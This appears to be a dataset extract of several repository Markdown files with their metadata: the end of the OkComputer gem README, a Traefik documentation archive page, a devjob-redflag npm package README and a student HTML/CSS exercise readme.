OkComputer NewRelic Ignore If NewRelic is installed, OkComputer automatically disables NewRelic monitoring for uptime checks, as it will start to artificially bring your request time down. If you'd like to intentionally count OkComputer requests in your NewRelic analytics, set: ``` # config/initializers/okcomputer.rb OkComputer.analytics_ignore = false ``` ## Development ### Setup ```plaintext $ bundle install ``` ### Running the test suite OkComputer tests are written with [RSpec](http://rspec.info/). To run the full test suite: ```plaintext $ rake spec ``` You may also use the environment variable `RAILS_VERSION` with one of the supported versions of Rails (found at the top of this file) to bundle and run the tests with a specific version of Rails. ## Contributing 1. Fork it 2. Create your feature branch (`git checkout -b my-new-feature`) 3. Commit your changes (`git commit -am 'Add some feature'`) 4. Push to the branch (`git push origin my-new-feature`) 5. Create new Pull Request [fitter-happier]:https://rubygems.org/gems/fitter-happier
29.372881
138
0.769475
eng_Latn
0.915713
6f6c323ae6194545ecc4d4cd621da4783737076a
607
md
Markdown
docs/archive.md
dongdongking008/traefik
9b3750320bbfa937d7f9e433f3d4c13e859aed55
[ "MIT" ]
1
2017-12-31T11:03:01.000Z
2017-12-31T11:03:01.000Z
docs/archive.md
dongdongking008/traefik
9b3750320bbfa937d7f9e433f3d4c13e859aed55
[ "MIT" ]
3
2021-05-09T04:14:26.000Z
2022-03-02T09:50:41.000Z
docs/archive.md
dongdongking008/traefik
9b3750320bbfa937d7f9e433f3d4c13e859aed55
[ "MIT" ]
1
2018-04-18T14:05:26.000Z
2018-04-18T14:05:26.000Z
## Current versions documentation - [Latest stable](https://docs.traefik.io) ## Future version documentation - [Experimental](https://master--traefik-docs.netlify.com/) ## Previous versions documentation - [v1.5 aka Cancoillotte](http://v1-5.archive.docs.traefik.io/) - [v1.4 aka Roquefort](http://v1-4.archive.docs.traefik.io/) - [v1.3 aka Raclette](http://v1-3.archive.docs.traefik.io/) - [v1.2 aka Morbier](http://v1-2.archive.docs.traefik.io/) - [v1.1 aka Camembert](http://v1-1.archive.docs.traefik.io/) ## More [Change log](https://github.com/containous/traefik/blob/master/CHANGELOG.md)
25.291667
76
0.711697
yue_Hant
0.434057
6f6c5919004dc969a85ac65caf8fb64fcec3a422
846
md
Markdown
README.md
q3e/devjob-redflag
987b7d4e1dd9ae9fcf06236e5d7e7849639fa563
[ "MIT" ]
null
null
null
README.md
q3e/devjob-redflag
987b7d4e1dd9ae9fcf06236e5d7e7849639fa563
[ "MIT" ]
null
null
null
README.md
q3e/devjob-redflag
987b7d4e1dd9ae9fcf06236e5d7e7849639fa563
[ "MIT" ]
null
null
null
# devjob-redflag inspired by https://mobile.twitter.com/mgoldst/status/1231234970968109057 - plus more red flags ## What it does Helps you identify common developer job posts that may be a waste of time applying for. ## Why? - Some job posts are there just to harvest developer resumes for future use - Some are just exploitative roles and toxic companies. ... ## How to use run ``` npm i devpost-redflag ``` find a specific job post that you would like to check. Get the url to that post, then in your project: ``` const checkRedflag = require('devpost-redflag') checkRedflag('https://www.indeed.com/q-Rockstar-Java-Developer-jobs.html?vjk=c788c338e737283f') .them(result => { console.log(result) // { flagsFound: [ 'rockstar' ], rate: '8.333333333333332%' } }) ``` ## todo [] global install using cli args [] browser extension
22.263158
102
0.72695
eng_Latn
0.961997
6f6c59710d4157cfdf1ffc067590f92b90d4191b
643
md
Markdown
readme.md
BAPotts/boring-lecture
08f643e75ddc443c05ba6ec9b441a20bb5be621f
[ "MIT" ]
null
null
null
readme.md
BAPotts/boring-lecture
08f643e75ddc443c05ba6ec9b441a20bb5be621f
[ "MIT" ]
null
null
null
readme.md
BAPotts/boring-lecture
08f643e75ddc443c05ba6ec9b441a20bb5be621f
[ "MIT" ]
null
null
null
# _Boring Lecture_ #### _HTML/CSS exercise for Epicodus, 6/3/2020_ #### By _**Beverly Potts**_ ## Description _This web page shows a picture of teacher and includes several paragraphs of dummy text to practice working with css rules._ ## Setup/Installation Requirements * Clone this repository * Navigate to the boring-lecture directory * Open index.html in a browser to view page! ## Known Bugs _There are no known bugs at this time._ ## Support and contact details _Contact: pottsbeverly@gmail.com_ ## Technologies Used _HTML, CSS_ ### License *This is licensed under the MIT license.* Copyright (c) 2020 **_Beverly Potts_**
18.911765
124
0.746501
eng_Latn
0.978013